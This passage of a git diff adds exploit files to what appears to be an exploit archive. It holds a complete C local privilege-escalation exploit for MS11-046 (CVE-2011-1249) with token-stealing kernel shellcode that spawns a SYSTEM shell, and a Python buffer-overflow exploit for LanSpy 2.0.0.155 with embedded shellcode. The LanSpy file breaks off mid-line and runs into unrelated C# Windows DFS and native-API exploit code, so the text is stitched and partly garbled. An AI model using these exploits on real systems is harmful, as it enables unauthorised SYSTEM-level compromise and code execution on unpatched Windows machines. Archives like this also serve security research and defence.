ProfileMaximum +} KPROFILE_SOURCE, *PKPROFILE_SOURCE; + + +typedef DWORD (WINAPI *PNTQUERYINTERVAL) ( + KPROFILE_SOURCE ProfileSource, + PULONG Interval +); + + +typedef LONG NTSTATUS; + + +typedef NTSTATUS (WINAPI *PNTALLOCATE) ( + HANDLE ProcessHandle, + PVOID *BaseAddress, + ULONG ZeroBits, + PULONG RegionSize, + ULONG AllocationType, + ULONG Protect +); + + +typedef struct _IO_STATUS_BLOCK { + union { + NTSTATUS Status; + PVOID Pointer; + }; + ULONG_PTR Information; +} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; + + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Reserved[2]; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT Unknown; + USHORT LoadCount; + USHORT ModuleNameOffset; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + + +typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL); + + +//////////////////////////////////////////////////////////////// +// FUNCTIONS +//////////////////////////////////////////////////////////////// + +BOOL IsWow64() +{ + BOOL bIsWow64 = FALSE; + LPFN_ISWOW64PROCESS fnIsWow64Process; + + fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle(TEXT("kernel32")), "IsWow64Process"); + + if(NULL != fnIsWow64Process) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx + if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64)) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + printf(" [-] Failed (error code: %d)\n", GetLastError()); + return -1; + } + } + return bIsWow64; +} + + +//////////////////////////////////////////////////////////////// +// MAIN FUNCTION +//////////////////////////////////////////////////////////////// + +int main(void) +{ + printf("[*] MS11-046 (CVE-2011-1249) x86 exploit\n"); + printf(" [*] by Tomislav Paskalev\n"); + + + //////////////////////////////////////////////////////////////// + // IDENTIFY TARGET OS ARCHITECTURE AND VERSION + //////////////////////////////////////////////////////////////// + + printf("[*] Identifying OS\n"); + + + // identify target machine's OS architecture + // in case the target machine is running a 64-bit OS + if(IsWow64()) + { + printf(" [-] 64-bit\n"); + return -1; + } + + printf(" [+] 32-bit\n"); + + + // identify target machine's OS version + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx + OSVERSIONINFOEX osvi; + ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX)); + osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); + GetVersionEx((LPOSVERSIONINFO) &osvi); + + // define operating system version specific variables + unsigned char shellcode_KPROCESS; + unsigned char shellcode_TOKEN; + unsigned char shellcode_UPID; + unsigned char shellcode_APLINKS; + const char **securityPatchesPtr; + int securityPatchesCount; + int lpInBufferSize; + + //////////////////////////////////////////////////////////////// + /* + OS VERSION SPECIFIC OFFSETS + + references: + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/original.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/late52.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/current.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/ + + + - nt!_KTHREAD.ApcState.Process (+0x10) + 0x30 (3.51); + 0x34 (>3.51 to 5.1); + 0x28 (late 5.2); + 0x38 (6.0); + 0x40 (6.1); + 0x70 (6.2 and higher) + + - nt!_EPROCESS.Token + 0x0108 (3.51 to 4.0); + 0x012C (5.0); + 0xC8 (5.1 to early 5.2); + 0xD8 (late 5.2); + 0xE0 (6.0); + 0xF8 (6.1); + 0xEC (6.2 to 6.3); + 0xF4 + + - nt!_EPROCESS.UniqueProcessId + 0x94 (3.51 to 4.0); + 0x9C (5.0); + 0x84 (5.1 to early 5.2); + 0x94 (late 5.2); + 0x9C (6.0); + 0xB4 + + - nt!_EPROCESS.ActiveProcessLinks.Flink + 0x98 (3.51 to 4.0); + 0xA0 (5.0); + 0x88 (5.1 to early 5.2); + 0x98 (late 5.2); + 0xA0 (6.0); + 0xB8 + + */ + //////////////////////////////////////////////////////////////// + + // in case the OS version is 5.1, service pack 3 + if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 3)) + { + // the target machine's OS is Windows XP SP3 + printf(" [+] Windows XP SP3\n"); + shellcode_KPROCESS = '\x44'; + shellcode_TOKEN = '\xC8'; + shellcode_UPID = '\x84'; + shellcode_APLINKS = '\x88'; + const char *securityPatches[] = {"KB2503665", "KB2592799"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 2; + lpInBufferSize = 0x30; + } + + // in case the OS version is 5.2, service pack 2, not R2 + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724385(v=vs.85).aspx + else if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 2) && (osvi.wServicePackMajor == 2) && (GetSystemMetrics(89) == 0)) + { + // the target machine's OS is Windows Server 2003 SP2 + printf(" [+] Windows Server 2003 SP2\n"); + shellcode_KPROCESS = '\x38'; + shellcode_TOKEN = '\xD8'; + shellcode_UPID = '\x94'; + shellcode_APLINKS = '\x98'; + const char *securityPatches[] = {"KB2503665", "KB2592799", "KB2645640", "KB2975684"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 4; + lpInBufferSize = 0x30; + } + + // in case the OS version is 6.0, service pack 1, workstation + else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 1) && (osvi.wProductType == 1)) + { + // the target machine's OS is Windows Vista SP1 + printf(" [+] Windows Vista SP1\n"); + shellcode_KPROCESS = '\x48'; + shellcode_TOKEN = '\xE0'; + shellcode_UPID = '\x9C'; + shellcode_APLINKS = '\xA0'; + const char *securityPatches[] = {"KB2503665"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 1; + lpInBufferSize = 0x30; + } + + // in case the OS version is 6.0, service pack 2, workstation + else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 2) && (osvi.wProductType == 1)) + { + // the target machine's OS is Windows Vista SP2 + printf(" [+] Windows Vista SP2\n"); + shellcode_KPROCESS = '\x48'; + shellcode_TOKEN = '\xE0'; + shellcode_UPID = '\x9C'; + shellcode_APLINKS = '\xA0'; + const char *securityPatches[] = {"KB2503665", "KB2975684"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 2; + lpInBufferSize = 0x10; + } + + // in case the OS version is 6.0, no service pack*, server + // *Because Windows Server 2008 is based on the Windows NT 6.0 Service Pack 1 kernel, the RTM release is considered to be Service Pack 1; + // accordingly, the first service pack is called Service Pack 2. + // https://en.wikipedia.org/wiki/Windows_Server_2008 + else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 1) && (osvi.wProductType != 1)) + { + // the target machine's OS is Windows Server 2008 + printf(" [+] Windows Server 2008\n"); + shellcode_KPROCESS = '\x48'; + shellcode_TOKEN = '\xE0'; + shellcode_UPID = '\x9C'; + shellcode_APLINKS = '\xA0'; + const char *securityPatches[] = {"KB2503665"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 1; + lpInBufferSize = 0x10; + } + + // in case the OS version is 6.0, service pack 2, server + else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 0) && (osvi.wServicePackMajor == 2) && (osvi.wProductType != 1)) + { + // the target machine's OS is Windows Server 2008 SP2 + printf(" [+] Windows Server 2008 SP2\n"); + shellcode_KPROCESS = '\x48'; + shellcode_TOKEN = '\xE0'; + shellcode_UPID = '\x9C'; + shellcode_APLINKS = '\xA0'; + const char *securityPatches[] = {"KB2503665", "KB2975684"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 2; + lpInBufferSize = 0x08; + } + + // in case the OS version is 6.1, no service pack (note: Windows Server 2008 R2 is 64-bit only) + else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 0)) + { + // the target machine's OS is Windows 7 + printf(" [+] Windows 7\n"); + shellcode_KPROCESS = '\x50'; + shellcode_TOKEN = '\xF8'; + shellcode_UPID = '\xB4'; + shellcode_APLINKS = '\xB8'; + const char *securityPatches[] = {"KB2503665"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 1; + lpInBufferSize = 0x20; + } + + // in case the OS version is 6.1, service pack 1 (note: Windows Server 2008 R2 is 64-bit only) + else if((osvi.dwMajorVersion == 6) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 1)) + { + // the target machine's OS is Windows 7 SP1 + printf(" [+] Windows 7 SP1\n"); + shellcode_KPROCESS = '\x50'; + shellcode_TOKEN = '\xF8'; + shellcode_UPID = '\xB4'; + shellcode_APLINKS = '\xB8'; + const char *securityPatches[] = {"KB2503665", "KB2975684"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 2; + lpInBufferSize = 0x10; + } + + // in case the OS version is not any of the previously checked versions + else + { + // the target machine's OS is an unsupported 32-bit Windows version + printf(" [-] Unsupported version\n"); + printf(" [*] Affected 32-bit operating systems\n"); + printf(" [*] Windows XP SP3\n"); + printf(" [*] Windows Server 2003 SP2\n"); + printf(" [*] Windows Vista SP1\n"); + printf(" [*] Windows Vista SP2\n"); + printf(" [*] Windows Server 2008\n"); + printf(" [*] Windows Server 2008 SP2\n"); + printf(" [*] Windows 7\n"); + printf(" [*] Windows 7 SP1\n"); + return -1; + } + + + //////////////////////////////////////////////////////////////// + // LOCATE REQUIRED OS COMPONENTS + //////////////////////////////////////////////////////////////// + + printf("[*] Locating required OS components\n"); + + + // retrieve system information + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms725506(v=vs.85).aspx + // locate "ZwQuerySystemInformation" in the "ntdll.dll" module + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx + FARPROC ZwQuerySystemInformation; + ZwQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation"); + + // 11 = SystemModuleInformation + // http://winformx.florian-rappl.de/html/e6d5d5c1-8d83-199b-004f-8767439c70eb.htm + ULONG systemInformation; + ZwQuerySystemInformation(11, (PVOID) &systemInformation, 0, &systemInformation); + + // allocate memory for the list of loaded modules + ULONG *systemInformationBuffer; + systemInformationBuffer = (ULONG *) malloc(systemInformation * sizeof(*systemInformationBuffer)); + + if(!systemInformationBuffer) + { + printf(" [-] Could not allocate memory"); + return -1; + } + + + // retrieve the list of loaded modules + ZwQuerySystemInformation(11, systemInformationBuffer, systemInformation * sizeof(*systemInformationBuffer), NULL); + + // locate "ntkrnlpa.exe" or "ntoskrnl.exe" in the retrieved list of loaded modules + ULONG i; + PVOID targetKrnlMdlBaseAddr; + HMODULE targetKrnlMdlUsrSpcOffs; + BOOL foundModule = FALSE; + PSYSTEM_MODULE_INFORMATION loadedMdlStructPtr; + loadedMdlStructPtr = (PSYSTEM_MODULE_INFORMATION) (systemInformationBuffer + 1); + + for(i = 0; i < *systemInformationBuffer; i++) + { + if(strstr(loadedMdlStructPtr[i].ImageName, "ntkrnlpa.exe")) + { + printf(" [+] ntkrnlpa.exe\n"); + targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntkrnlpa.exe", 0, 1); + targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base; + foundModule = TRUE; + break; + } + else if(strstr(loadedMdlStructPtr[i].ImageName, "ntoskrnl.exe")) + { + printf(" [+] ntoskrnl.exe\n"); + targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntoskrnl.exe", 0, 1); + targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base; + foundModule = TRUE; + break; + } + } + + // base address of the loaded module (kernel space) + printf(" [*] Address: %#010x\n", targetKrnlMdlBaseAddr); + + // offset address (relative to the parent process) of the loaded module (user space) + printf(" [*] Offset: %#010x\n", targetKrnlMdlUsrSpcOffs); + + if(!foundModule) + { + printf(" [-] Could not find ntkrnlpa.exe/ntoskrnl.exe\n"); + return -1; + } + + // free allocated buffer space + free(systemInformationBuffer); + + + // determine the address of the "HalDispatchTable" process (kernel space) + // locate the offset fo the "HalDispatchTable" process within the target module (user space) + ULONG_PTR HalDispatchTableUsrSpcOffs; + HalDispatchTableUsrSpcOffs = (ULONG_PTR) GetProcAddress(targetKrnlMdlUsrSpcOffs, "HalDispatchTable"); + + if(!HalDispatchTableUsrSpcOffs) + { + printf(" [-] Could not find HalDispatchTable\n"); + return -1; + } + + printf(" [+] HalDispatchTable\n"); + printf(" [*] Offset: %#010x\n", HalDispatchTableUsrSpcOffs); + + // calculate the address of "HalDispatchTable" in kernel space + // 1. identify the base address of the target module in kernel space + // 2. previous step's result [minus] the load address of the same module in user space + // 3. previous step's result [plus] the address of "HalDispatchTable" in user space + // EQUIVALENT TO: + // 1. determine RVA of HalDispatchTable + // *Relative Virtual Address - the address of an item after it is loaded into memory, with the base address of the image file subtracted from it. + // 2. previous step's result [plus] base address of target module in kernel space + ULONG_PTR HalDispatchTableKrnlSpcAddr; + HalDispatchTableKrnlSpcAddr = HalDispatchTableUsrSpcOffs - (ULONG_PTR) targetKrnlMdlUsrSpcOffs; + HalDispatchTableKrnlSpcAddr += (ULONG_PTR) targetKrnlMdlBaseAddr; + + + // locate "NtQueryIntervalProfile" in the "ntdll.dll" module + PNTQUERYINTERVAL NtQueryIntervalProfile; + NtQueryIntervalProfile = (PNTQUERYINTERVAL) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); + + if(!NtQueryIntervalProfile) + { + printf(" [-] Could not find NtQueryIntervalProfile\n"); + return -1; + } + + printf(" [+] NtQueryIntervalProfile\n"); + printf(" [*] Address: %#010x\n", NtQueryIntervalProfile); + + + // locate "ZwDeviceIoControlFile" routine in the "ntdll.dll" module + // https://msdn.microsoft.com/en-us/library/windows/hardware/ff566441(v=vs.85).aspx + FARPROC ZwDeviceIoControlFile; + ZwDeviceIoControlFile = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwDeviceIoControlFile"); + + if(!ZwDeviceIoControlFile) + { + printf(" [-] Could not find ZwDeviceIoControlFile\n"); + return -1; + } + + printf(" [+] ZwDeviceIoControlFile\n"); + printf(" [*] Address: %#010x\n", ZwDeviceIoControlFile); + + + //////////////////////////////////////////////////////////////// + // SETUP EXPLOITATION PREREQUISITE + //////////////////////////////////////////////////////////////// + + printf("[*] Setting up exploitation prerequisite\n"); + + + // initialize Winsock DLL + printf (" [*] Initialising Winsock DLL\n"); + WORD wVersionRequested; + WSADATA wsaData; + int wsaStartupErrorCode; + + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms632663(v=vs.85).aspx + wVersionRequested = MAKEWORD(2, 2); + + // initiate the use of the Winsock DLL + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms742213(v=vs.85).aspx + wsaStartupErrorCode = WSAStartup(wVersionRequested, &wsaData); + + if(wsaStartupErrorCode != 0) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + printf(" [-] Failed (error code: %d)\n", wsaStartupErrorCode); + return -1; + } + + printf(" [+] Done\n"); + + + // create socket + printf(" [*] Creating socket\n"); + SOCKET targetDeviceSocket = INVALID_SOCKET; + + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms742212(v=vs.85).aspx + targetDeviceSocket = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); + + if(targetDeviceSocket == INVALID_SOCKET) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + printf(" [-] Failed (error code: %ld)\n", WSAGetLastError()); + return -1; + } + + printf(" [+] Done\n"); + + + // connect to a closed port + // connect to port 0 on the local machine + struct sockaddr_in clientService; + clientService.sin_family = AF_INET; + clientService.sin_addr.s_addr = inet_addr("127.0.0.1"); + clientService.sin_port = htons(0); + + printf(" [*] Connecting to closed port\n"); + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms737625(v=vs.85).aspx + int connectResult; + connectResult = connect(targetDeviceSocket, (SOCKADDR *) &clientService, sizeof(clientService)); + if (connectResult == 0) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + printf (" [-] Connected (error code: %ld)\n", WSAGetLastError()); + return -1; + } + + printf(" [+] Done\n"); + + + //////////////////////////////////////////////////////////////// + // CREATE TOKEN STEALING SHELLCODE + //////////////////////////////////////////////////////////////// + + printf("[*] Creating token stealing shellcode\n"); + + + // construct the token stealing shellcode + unsigned char shellcode[] = + { + 0x52, // PUSH EDX Save EDX on the stack (save context) + 0x53, // PUSH EBX Save EBX on the stack (save context) + 0x33,0xC0, // XOR EAX, EAX Zero out EAX (EAX = 0) + 0x64,0x8B,0x80,0x24,0x01,0x00,0x00, // MOV EAX, FS:[EAX+0x124] Retrieve current _KTHREAD structure + 0x8B,0x40,shellcode_KPROCESS, // MOV EAX, [EAX+_KPROCESS] Retrieve _EPROCESS structure + 0x8B,0xC8, // MOV ECX, EAX Copy EAX (_EPROCESS) to ECX + 0x8B,0x98,shellcode_TOKEN,0x00,0x00,0x00, // MOV EBX, [EAX+_TOKEN] Retrieve current _TOKEN + 0x8B,0x80,shellcode_APLINKS,0x00,0x00,0x00, // MOV EAX, [EAX+_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks + 0x81,0xE8,shellcode_APLINKS,0x00,0x00,0x00, // SUB EAX, _APLINKS | Retrieve EPROCESS from ActiveProcessLinks + 0x81,0xB8,shellcode_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // CMP [EAX+_UPID], 0x4 | Compare UniqueProcessId with 4 (System Process) + 0x75,0xE8, // JNZ/JNE ---- Jump if not zero/not equal + 0x8B,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV EDX, [EAX+_TOKEN] Copy SYSTEM _TOKEN to EDX + 0x8B,0xC1, // MOV EAX, ECX Copy ECX (current process _TOKEN) to EAX + 0x89,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV [EAX+_TOKEN], EDX Copy SYSTEM _TOKEN to current process _TOKEN + 0x5B, // POP EBX Pop current stack value to EBX (restore context) + 0x5A, // POP EDX Pop current stack value to EDX (restore context) + 0xC2,0x08 // RET 8 Return + }; + + printf(" [*] Shellcode assembled\n"); + + + // allocate memory (RWE permissions) for the shellcode + printf(" [*] Allocating memory\n"); + LPVOID shellcodeAddress; + shellcodeAddress = VirtualAlloc((PVOID) 0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + int errorCode = 0; + + if(shellcodeAddress == NULL) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + errorCode = GetLastError(); + // in case of ERROR_INVALID_ADDRESS + if(errorCode == 487) + { + // Attempt to access invalid address + // occurs since a fixed address is being reserved + // http://stackoverflow.com/questions/21368429/error-code-487-error-invalid-address-when-using-virtualallocex + printf(" [!] Could not reserve entire range\n"); + printf(" [*] Rerun exploit\n"); + } + // in case of any other error + else + printf(" [-] Failed (error code: %d)\n", errorCode); + return -1; + } + + printf(" [+] Address: %#010x\n", shellcodeAddress); + + + // copy the shellcode to the allocated memory + memset(shellcodeAddress, 0x90, 0x20000); + memcpy((shellcodeAddress + 0x10000), shellcode, sizeof(shellcode)); + printf(" [*] Shellcode copied\n"); + + + //////////////////////////////////////////////////////////////// + // EXPLOIT THE VULNERABILITY + //////////////////////////////////////////////////////////////// + + printf("[*] Exploiting vulnerability\n"); + + + // send AFD socket connect request + printf(" [*] Sending AFD socket connect request\n"); + DWORD lpInBuffer[lpInBufferSize]; + memset(lpInBuffer, 0, (lpInBufferSize * sizeof(DWORD))); + + lpInBuffer[3] = 0x01; + lpInBuffer[4] = 0x20; + ULONG lpBytesReturned = 0; + + if(DeviceIoControl( + (HANDLE) targetDeviceSocket, + 0x00012007, // IOCTL_AFD_CONNECT + (PVOID) lpInBuffer, sizeof(lpInBuffer), + (PVOID) (HalDispatchTableKrnlSpcAddr + 0x6), 0x0, + &lpBytesReturned, NULL + ) == 0) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx + errorCode = GetLastError(); + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + // in case of ERROR_INVALID_NETNAME + if(errorCode == 1214) + { + // AFD socket connect request successful + printf(" [+] Done\n"); + } + // in case of ERROR_NOACCESS + else if(errorCode == 998) + { + // AFD socket connect request unsuccessful - target is patched + printf(" [!] Target patched\n"); + printf(" [*] Possible security patches\n"); + for(i = 0; i < securityPatchesCount; i++) + printf(" [*] %s\n", securityPatchesPtr[i]); + return -1; + } + // in case of any other error message + else + { + // print the error code + printf(" [-] Failed (error code: %d)\n", errorCode); + return -1; + } + } + + + // elevate privileges of the current process + printf(" [*] Elevating privileges to SYSTEM\n"); + ULONG outInterval = 0; + // https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProfile%2FNtQueryIntervalProfile.html + NtQueryIntervalProfile(2, &outInterval); + printf(" [+] Done\n"); + + + // spawn shell (with elevated privileges) + printf(" [*] Spawning shell\n"); + // spawn SYSTEM shell within the current shell (remote shell friendly) + system ("c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32"); + + // clean up and exit + printf("\n[*] Exiting SYSTEM shell\n"); + WSACleanup(); + return 1; +} + +// EoF diff --git a/platforms/windows/local/40567.py b/platforms/windows/local/40567.py new file mode 100755 index 000000000..be13dad1f --- /dev/null +++ b/platforms/windows/local/40567.py @@ -0,0 +1,80 @@ +#!/usr/bin/python + +### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ### + +# Date: 2016-10-18 +# Exploit Author: n30m1nd +# Vendor Homepage: www.lantricks.com +# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe +# Version: LanSpy 2.0.0.155 +# Tested on: Tested on Win7 32bit and Win10 64 bit + +# Platforms +# ========= +# Tested on Win7 32bit and Win10 64 bit +# This exploit should work everywhere since the binary does not implement DEP nor ASLR + +# Credits +# ======= +# Shouts to hyp3rlinx for the PoC: +# https://www.exploit-db.com/exploits/38399/ +# http://hyp3rlinx.altervista.org/ +# And shouts to the crew at Offensive Security for their huge efforts on making +# the infosec community better + +# How to +# ====== +# * Run this python script. It will generate an "addresses.txt" file. +# * Replace this file in the root directory of your LanSpy.exe installation. +# * Run LanSpy.exe and start the scan or do so by pressing F3. +# - You can also call LanSpy.exe from the command line like the following and +# it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe + +# Exploit code +# ============ + +import struct + +# 32bit Alphanum-ish shellcodes +# Bad chars detected: 00 2d 20 + +# MessageBoxA at => 00404D80 +msgbox_shellcode = ( + "\x31\xC0\x50\x68" + "\x70\x77\x6E\x64" + "\x54\x5F\x50\x57" + "\x57\x50\x35\xC4" + "\x80\x80\x55\x35" + "\x44\xCD\xC0\x55" + "\x50\xC3" + ) + +# WinExec at -> 004EC4FF +calc_shellcode = ( + "\x31\xC0\x50\x68" + "\x63\x61\x6C\x63" + "\x54\x5F\x50\x57" + "\x35\xC3\x4E\xC3" + "\x55\x35\x3C\x8A" + "\x8D\x55\x50\xC3" + ) + +# Change the shellcode to be used here +scde = calc_shellcode +#scde = msgbox_shellcode + +# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides +junk = 'A'*(676-126) +if len(scde) > 126: + exit("[e] Shellcode is too big! Egghunter maybe? ;)") + +# 0040407D => jmp ecx inside LanSpy +jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack(' 0) + { + return Marshal.PtrToStringUni(buffer); + } + } + finally + { + if (buffer != IntPtr.Zero) + { + LocalFree(buffer); + } + } + return String.Format("Unknown Error: 0x{0:X08}", status); + } + + public NtException(int status) : base(StatusToString(status)) + { + } + } + + public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid + { + public SafeHGlobalBuffer(int length) + : this(Marshal.AllocHGlobal(length), length, true) + { + } + + public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle) + : base(owns_handle) + { + Length = length; + SetHandle(buffer); + } + + public int Length + { + get; private set; + } + + protected override bool ReleaseHandle() + { + if (!IsInvalid) + { + Marshal.FreeHGlobal(handle); + handle = IntPtr.Zero; + } + return true; + } + } + + public class SafeStructureBuffer : SafeHGlobalBuffer + { + Type _type; + + public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value)) + { + _type = value.GetType(); + Marshal.StructureToPtr(value, handle, false); + } + + protected override bool ReleaseHandle() + { + if (!IsInvalid) + { + Marshal.DestroyStructure(handle, _type); + } + return base.ReleaseHandle(); + } + } + + public class SafeStructureOutBuffer : SafeHGlobalBuffer + { + public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T))) + { + } + + public T Result + { + get + { + if (IsInvalid) + throw new ObjectDisposedException("handle"); + + return Marshal.PtrToStructure(handle); + } + } + } + + public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit) + { + AttributeFlags flags = AttributeFlags.CaseInsensitive; + if (inherit) + flags |= AttributeFlags.Inherit; + using (ObjectAttributes obja = new ObjectAttributes(name, flags)) + { + IntPtr handle; + IoStatus iostatus = new IoStatus(); + int status = NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions); + StatusToNtException(status); + return new SafeFileHandle(handle, true); + } + } + + [DllImport("ntdll.dll")] + public static extern int NtDeviceIoControlFile( + SafeFileHandle FileHandle, + IntPtr Event, + IntPtr ApcRoutine, + IntPtr ApcContext, + [Out] IoStatus IoStatusBlock, + uint IoControlCode, + byte[] InputBuffer, + int InputBufferLength, + byte[] OutputBuffer, + int OutputBufferLength + ); + + [DllImport("ntdll.dll")] + public static extern int NtFsControlFile( + SafeFileHandle FileHandle, + IntPtr Event, + IntPtr ApcRoutine, + IntPtr ApcContext, + [Out] IoStatus IoStatusBlock, + uint FSControlCode, + [In] byte[] InputBuffer, + int InputBufferLength, + [Out] byte[] OutputBuffer, + int OutputBufferLength + ); + + [DllImport("ntdll.dll")] + static extern int NtCreateDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes); + + [DllImport("ntdll.dll")] + static extern int NtOpenDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes); + + const int ProcessDeviceMap = 23; + + [DllImport("ntdll.dll")] + static extern int NtSetInformationProcess( + IntPtr ProcessHandle, + int ProcessInformationClass, + byte[] ProcessInformation, + int ProcessInformationLength); + + const uint CREATE_DRIVE_LETTER = 0x601E0; + const uint DELETE_DRIVE_LETTER = 0x601E4; + + [StructLayout(LayoutKind.Sequential)] + struct DFsCreateDriveParameters + { + public ushort unk0; // 0 + public ushort flags; // 1 + public uint some_cred_value; // 2 + public ushort drive_path_length; // 4 - Length of drive letter path + public ushort dfs_path_length; // 5 - Can't be zero, think this is length of DFS path + public ushort creds_length; // 6 + public ushort password_length; // 7 - If set this + 2 must be < length 3 + public ushort length_5; // 8 + public ushort length_6; // 9 + // From here is the data + } + + static byte[] StructToBytes(object o) + { + int size = Marshal.SizeOf(o); + IntPtr p = Marshal.AllocHGlobal(size); + try + { + Marshal.StructureToPtr(o, p, false); + byte[] ret = new byte[size]; + Marshal.Copy(p, ret, 0, size); + return ret; + } + finally + { + if (p != IntPtr.Zero) + Marshal.FreeHGlobal(p); + } + } + + static byte[] GetBytes(string s) + { + return Encoding.Unicode.GetBytes(s + "\0"); + } + + static void MountDfsShare(string dfs_path, string drive_path) + { + using (SafeFileHandle handle = OpenFile(@"\Device\DfsClient", FileAccessRights.MaximumAllowed, ShareMode.None, FileOpenOptions.None, false)) + { + IoStatus status = new IoStatus(); + + byte[] dfs_path_bytes = GetBytes(dfs_path); + byte[] drive_path_bytes = GetBytes(drive_path); + DFsCreateDriveParameters create_drive = new DFsCreateDriveParameters(); + + create_drive.drive_path_length = (ushort)drive_path_bytes.Length; + create_drive.dfs_path_length = (ushort)dfs_path_bytes.Length; + + List buffer = new List(); + buffer.AddRange(StructToBytes(create_drive)); + buffer.AddRange(drive_path_bytes); + buffer.AddRange(dfs_path_bytes); + + StatusToNtException(NtFsControlFile(handle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, status, CREATE_DRIVE_LETTER, buffer.ToArray(), buffer.Count, new byte[0], 0)); + } + } + + static void UnmountDfsShare(string drive_path) + { + using (SafeFileHandle handle = OpenFile(@"\Device\DfsClient", FileAccessRights.MaximumAllowed, ShareMode.None, FileOpenOptions.None, false)) + { + List buffer = new List(); + buffer.AddRange(new byte[4]); + buffer.AddRange(GetBytes(drive_path)); + byte[] output_data = new byte[8]; + IoStatus status = new IoStatus(); + StatusToNtException(NtFsControlFile(handle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, + status, DELETE_DRIVE_LETTER, buffer.ToArray(), buffer.Count, output_data, output_data.Length)); + } + } + + static SafeKernelObjectHandle CreateDirectory(string path) + { + using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive)) + { + IntPtr handle; + StatusToNtException(NtCreateDirectoryObject(out handle, DirectoryAccessRights.GenericAll, obja)); + return new SafeKernelObjectHandle(handle, true); + } + } + + static 